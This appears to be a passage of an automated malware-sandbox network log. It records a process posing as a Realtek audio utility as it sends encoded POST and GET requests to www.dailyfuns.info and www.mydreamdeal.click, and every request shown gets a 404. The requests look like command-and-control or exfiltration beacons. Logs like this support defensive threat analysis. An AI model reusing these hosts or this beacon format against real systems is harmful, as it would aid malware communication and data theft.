                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dailyfuns.info
                                                                                  Origin: http://www.dailyfuns.info
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Referer: http://www.dailyfuns.info/n9b0/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 6d 6e 42 41 43 6b 34 30 58 4d 65 33 50 78 2b 51 66 69 68 69 71 68 69 39 33 35 53 61 6e 46 50 71 50 58 62 53 48 75 78 79 72 58 32 64 43 37 64 55 43 59 5a 39 32 62 48 4b 44 47 69 6c 4f 72 41 68 4d 36 2b 36 4c 51 44 37 4d 42 32 65 6b 57 72 6d 42 6d 34 6d 4e 77 65 64 64 54 77 6c 46 6b 5a 48 31 75 50 59 75 57 34 78 46 54 72 6f 36 65 48 69 45 76 53 6f 6f 77 4a 48 42 45 5a 39 36 46 54 75 66 56 76 36 79 54 72 4d 4e 77 6b 6b 59 74 4a 33 67 32 35 67 4e 37 6a 73 2b 71 34 75 6a 4a 55 4d 75 6f 4c 68 36 6f 77 63 47 51 73 4a 78 7a 59 57 6b 6a 4c 31 77 77 4f 65 51 33 41 46 51 43 47 50 75 6a 58 72 36 51 4b 4a 58 63 3d
                                                                                  Data Ascii: IUY=N+9LpEXYE/G8ImnBACk40XMe3Px+Qfihiqhi935SanFPqPXbSHuxyrX2dC7dUCYZ92bHKDGilOrAhM6+6LQD7MB2ekWrmBm4mNweddTwlFkZH1uPYuW4xFTro6eHiEvSoowJHBEZ96FTufVv6yTrMNwkkYtJ3g25gN7js+q4ujJUMuoLh6owcGQsJxzYWkjL1wwOeQ3AFQCGPujXr6QKJXc=
                                                                                  Dec 4, 2024 17:13:02.220629930 CET533INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:13:02 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.11.2049745209.74.77.109807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:13:04.746201992 CET2578OUTPOST /n9b0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dailyfuns.info
                                                                                  Origin: http://www.dailyfuns.info
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 7368
                                                                                  Connection: close
                                                                                  Referer: http://www.dailyfuns.info/n9b0/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 6d 6e 42 41 43 6b 34 30 58 4d 65 33 50 78 2b 51 66 69 68 69 71 68 69 39 33 35 53 61 6e 4e 50 72 2b 33 62 41 52 6d 78 78 72 58 32 54 69 37 63 55 43 5a 44 39 32 44 62 4b 43 37 56 6c 4c 76 41 68 76 79 2b 38 36 51 44 77 4d 42 32 42 55 57 71 6f 68 6d 74 6d 4e 68 32 64 64 44 77 6c 46 6b 5a 48 32 32 50 49 4d 75 34 69 56 54 71 76 36 65 4c 6d 45 75 50 6f 6f 5a 79 48 42 4a 6d 39 71 6c 54 76 2f 46 76 38 41 37 72 55 64 77 69 6a 59 74 52 33 67 37 2b 67 4e 6e 76 73 38 4c 6a 75 68 70 55 4d 50 64 55 7a 75 5a 72 4e 32 45 45 41 52 6a 4a 43 43 37 45 34 7a 6b 6b 4f 79 33 65 4a 6d 4b 2b 50 65 7a 2b 38 37 4d 54 4b 33 68 39 2b 69 62 45 66 57 54 75 4c 64 31 32 6a 38 6f 34 50 54 65 75 6c 59 57 58 33 67 69 48 42 49 79 47 71 61 4d 48 43 6e 6c 34 73 70 39 2b 41 32 4e 58 2b 61 55 50 67 41 67 69 4f 73 73 46 79 34 73 6a 74 76 6b 7a 70 2b 45 51 45 31 79 4f 41 6a 68 39 6d 72 48 56 55 4f 51 2f 71 59 47 6a 64 54 35 50 68 59 46 35 57 6c 70 36 74 45 67 36 34 77 38 6e 62 2b 49 4b 78 33 [TRUNCATED]
                                                                                  Data Ascii: IUY=N+9LpEXYE/G8ImnBACk40XMe3Px+Qfihiqhi935SanNPr+3bARmxxrX2Ti7cUCZD92DbKC7VlLvAhvy+86QDwMB2BUWqohmtmNh2ddDwlFkZH22PIMu4iVTqv6eLmEuPooZyHBJm9qlTv/Fv8A7rUdwijYtR3g7+gNnvs8LjuhpUMPdUzuZrN2EEARjJCC7E4zkkOy3eJmK+Pez+87MTK3h9+ibEfWTuLd12j8o4PTeulYWX3giHBIyGqaMHCnl4sp9+A2NX+aUPgAgiOssFy4sjtvkzp+EQE1yOAjh9mrHVUOQ/qYGjdT5PhYF5Wlp6tEg64w8nb+IKx32zmoeJqDHz/wG2R2BgA/8/VcdnmQ8KXlISZqFXDHbJ7q9J1V0wkhEzZM8OZmQZrdHKRNKhfgqrMebwSip0SgXb9MEFUi4PSKDG1NWI8yTRf0mm0Q4rryMz4glrj5DMAIw/U5Ld7nsHQ366EjWtXH2u27hRQLB59Zn4EN9gSrecfvDhV5IScUjh1dhE2336zoC48dh9AAmvcHmvjtTGsDNhAvFOB6mjoDwXXj8biU3EYNl6v1L2Kqcty91fmC/kHAhnkmsF//07Zda7JeJFhVhUObwqj5YIPqhwWxw8ThnysyhIacUlyQ+Z9E/Y6Dg4HelUHbP+Mu002mJDNOIYYO1BnScjUrtUsBGHkodA8kIq4NVl331evbRIcD1M3Jv2s1M9Va6Xewg9S2WQ+WN13ErzbiIRrFPP+eoC8JXJe6oVLNDhnlet7PJXjDFigL4918PCLb+CtQKAN4vY1sCynTu0p2NES/5xxkn3lX1e47JWsc16eFwmEUfXjtYTBU1r3PrrqiGSeDF7rPk4TAU3vFwVhidKXnMAphI6uuFpkn9eEb/0f/hF/YiC4MiyahuB1pG6jobZ8fHP39+odTHl4lBxiy0PKLwTXIUTlj7SL/qCbBz+MUKX4KRvi9AvqEPOCSQgs7asidu6GbD0FkvrHUj5oZtte3CHfbM8 [TRUNCATED]
                                                                                  Dec 4, 2024 17:13:04.746228933 CET3867OUTData Raw: 41 4a 6e 34 79 64 2b 48 67 49 34 5a 66 4a 45 5a 5a 64 2f 63 77 66 47 59 76 6b 39 44 37 6c 69 63 72 77 70 36 45 68 72 2f 73 44 35 34 38 53 49 62 32 36 49 42 69 4a 30 67 66 70 56 42 59 42 7a 46 4d 39 4a 4a 5a 35 4f 42 55 65 6d 6b 5a 45 4e 64 7a 65
                                                                                  Data Ascii: AJn4yd+HgI4ZfJEZZd/cwfGYvk9D7licrwp6Ehr/sD548SIb26IBiJ0gfpVBYBzFM9JJZ5OBUemkZENdzeX3MyvnZTfbt+IFZ6sRj2WegnBNMieh2MmoyIbeqRm+55QWbOtC9FdAsFrdz5XKUF5cpqkS/CpYD6USf5BjVnYKOWA1W4SR/by8/Fs7LdbrTfKzdL169+yueRHex/Xd9Nqdzoa4zWrerLYKQx5C/gr1oUvfkc5HeOK
                                                                                  Dec 4, 2024 17:13:04.746298075 CET1484OUTData Raw: 68 32 7a 48 6e 6e 76 50 45 6a 48 75 32 6c 46 7a 62 64 6b 52 4f 78 79 37 4b 62 62 46 73 4d 63 72 64 35 73 59 4b 76 32 56 51 39 61 62 30 53 51 34 55 33 33 79 56 2b 6d 79 63 49 65 74 7a 5a 78 44 6e 30 42 74 68 32 63 31 55 44 66 59 6a 41 48 72 4f 55
                                                                                  Data Ascii: h2zHnnvPEjHu2lFzbdkROxy7KbbFsMcrd5sYKv2VQ9ab0SQ4U33yV+mycIetzZxDn0Bth2c1UDfYjAHrOUREOkcEAS+QyPtnMdM5rHbr0Fpn/jT6rH+eolSbHZsRIaPZO1cyqnZvoTioka/vo0RyqCnmDAviBFFxWbdjJspWfTdyu6zBcYUjRGv98XEUHcCkanw6XM5m9NDC9nHRH+eLZVvTXYR7AbVpaVSbbqfuJMpIXqVsHD1
                                                                                  Dec 4, 2024 17:13:04.939758062 CET533INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:13:04 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.11.2049746209.74.77.109807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:13:07.463846922 CET490OUTGET /n9b0/?IUY=A8VrqyfvUbO/Hw2LPQ4NsXlD/s5AVNHZj5dGp0FbdWJo87i+fAzGqYzWbkPjYDkNrmWhazG0hIjSjfnpkftd/stSTEWpskOuncpocPTypnt0UF6pA8n7oU4=&h7i-=tZtx HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dailyfuns.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Dec 4, 2024 17:13:07.656366110 CET548INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:13:07 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.11.2049747104.21.27.59807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:13:13.032011032 CET769OUTPOST /1ag2/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.mydreamdeal.click
                                                                                  Origin: http://www.mydreamdeal.click
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Connection: close
                                                                                  Referer: http://www.mydreamdeal.click/1ag2/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 42 4f 42 41 4e 70 56 62 51 4e 6d 32 67 33 54 59 38 4f 37 62 73 6f 70 79 6a 52 48 41 41 4e 65 62 54 35 33 70 58 39 77 46 76 76 31 51 53 77 56 31 6d 46 31 6b 67 37 66 46 53 47 76 6e 6d 31 47 51 46 4c 43 78 4e 62 31 71 47 34 37 59 41 44 42 38 49 54 44 49 38 71 69 4c 38 4b 36 68 34 65 59 2f 2b 68 66 72 39 6d 2b 30 45 51 51 79 64 65 77 4b 32 36 43 6f 6f 6f 63 53 75 67 33 55 7a 37 4d 79 67 4b 49 76 5a 6a 49 41 65 4b 32 63 4d 31 6c 72 68 47 76 57 41 4a 39 69 38 47 4e 38 34 38 76 69 32 73 4e 59 56 48 38 45 64 78 38 47 35 51 44 4f 47 6f 43 44 6d 41 3d 3d
                                                                                  Data Ascii: IUY=1XpfOM1gsz3GBOBANpVbQNm2g3TY8O7bsopyjRHAANebT53pX9wFvv1QSwV1mF1kg7fFSGvnm1GQFLCxNb1qG47YADB8ITDI8qiL8K6h4eY/+hfr9m+0EQQydewK26CooocSug3Uz7MygKIvZjIAeK2cM1lrhGvWAJ9i8GN848vi2sNYVH8Edx8G5QDOGoCDmA==
                                                                                  Dec 4, 2024 17:13:13.506921053 CET1068INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:13:13 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Expires: Wed, 04 Dec 2024 16:13:13 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H2xaDiYAiqFy4Y5Ljbsn9JgNS3lylklPiFppQNNX1kAIgTgzZ2xcB%2B21hzoBn9ObMl4ywG1%2FjYmpIo2czYvEMn%2FjHECtHEcHTMiVlez%2BuCCSfrLXADfE41Xvrz%2FV6VBbMRxsmAViVGA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ecd151cdd5b8dae-MIA
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=123889&min_rtt=123889&rtt_var=61944&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a
                                                                                  Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h
                                                                                  Dec 4, 2024 17:13:13.506936073 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.11.2049748104.21.27.59807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:13:15.682126045 CET789OUTPOST /1ag2/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.mydreamdeal.click
                                                                                  Origin: http://www.mydreamdeal.click
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Referer: http://www.mydreamdeal.click/1ag2/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 4f 50 52 41 49 4f 4a 62 41 64 6d 31 73 58 54 59 79 75 37 66 73 6f 6c 79 6a 51 44 51 42 2f 36 62 55 59 48 70 57 2b 6f 46 73 76 31 51 47 41 56 77 69 46 31 56 67 37 62 6e 53 48 54 6e 6d 78 57 51 46 4f 2b 78 4e 73 70 74 55 34 37 61 4c 6a 42 69 58 44 44 49 38 71 69 4c 38 4b 2b 4c 34 65 41 2f 2b 52 50 72 38 48 2b 37 4e 77 51 78 55 2b 77 4b 67 4b 44 76 6f 6f 64 46 75 68 62 74 7a 34 30 79 67 49 67 76 63 6e 55 48 51 4b 32 65 43 56 6c 2f 6d 32 53 64 44 37 5a 70 77 6e 30 67 38 2b 76 63 33 36 41 43 49 31 49 67 65 69 67 30 39 67 36 6d 45 71 44 59 37 4f 4f 6a 51 76 45 55 62 4a 32 38 46 77 37 6b 38 33 4b 70 58 76 6f 3d
                                                                                  Data Ascii: IUY=1XpfOM1gsz3GOPRAIOJbAdm1sXTYyu7fsolyjQDQB/6bUYHpW+oFsv1QGAVwiF1Vg7bnSHTnmxWQFO+xNsptU47aLjBiXDDI8qiL8K+L4eA/+RPr8H+7NwQxU+wKgKDvoodFuhbtz40ygIgvcnUHQK2eCVl/m2SdD7Zpwn0g8+vc36ACI1Igeig09g6mEqDY7OOjQvEUbJ28Fw7k83KpXvo=
                                                                                  Dec 4, 2024 17:13:16.190895081 CET1072INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:13:16 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Expires: Wed, 04 Dec 2024 16:13:16 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HxMPoYNuldWyKp7FtHgQgTQj02A8E8zr1nXnfaeBi7ueDiBMB%2BQeaySfbdjw7hM%2BBxjP%2BbTC61rvQ1jFULNlMQBGTBaZBMCUNG2DJfGrE%2Ft%2F%2BIFTI0OhiuYzJlL%2F5rChj6ulAMxTRFM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ecd152d5fc56de0-MIA
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=123677&min_rtt=123677&rtt_var=61838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=789&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a
                                                                                  Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h
                                                                                  Dec 4, 2024 17:13:16.191077948 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.11.2049749104.21.27.59807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:13:18.342364073 CET2578OUTPOST /1ag2/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.mydreamdeal.click
                                                                                  Origin: http://www.mydreamdeal.click
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 7368
                                                                                  Connection: close
                                                                                  Referer: http://www.mydreamdeal.click/1ag2/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 4f 50 52 41 49 4f 4a 62 41 64 6d 31 73 58 54 59 79 75 37 66 73 6f 6c 79 6a 51 44 51 42 2f 79 62 55 76 76 70 58 66 6f 46 74 76 31 51 61 51 56 78 69 46 31 79 67 37 6a 6a 53 48 66 52 6d 33 4b 51 45 73 6d 78 4c 64 70 74 65 34 37 61 45 44 42 6a 49 54 44 5a 38 71 79 50 38 4b 4f 4c 34 65 41 2f 2b 54 48 72 31 32 2b 37 42 51 51 79 64 65 77 47 32 36 43 49 6f 6f 30 77 75 68 66 69 7a 6f 55 79 75 49 51 76 65 79 49 48 63 4b 32 59 46 56 6b 34 6d 32 65 53 44 37 31 66 77 6d 78 33 38 35 37 63 30 64 5a 4b 4e 55 4d 59 42 55 34 4c 78 67 43 66 4e 62 79 54 6c 64 47 73 57 38 59 6e 61 4d 36 65 4f 54 72 38 67 45 47 72 57 2f 73 61 74 58 54 76 61 78 4c 37 7a 51 79 57 6c 79 77 58 77 37 34 79 57 71 44 32 53 43 4e 75 4c 6e 4b 7a 2f 70 64 76 51 52 45 49 34 6c 36 42 5a 68 47 4b 35 7a 59 68 57 6c 42 57 67 6b 43 44 67 30 48 52 4b 78 68 49 2b 51 49 39 34 59 6d 59 6b 30 55 4b 5a 4a 57 67 47 6e 48 35 51 72 57 66 48 70 76 54 4b 74 56 70 30 6a 69 38 74 31 54 64 66 74 61 67 5a 6c 6e 62 66 38 [TRUNCATED]
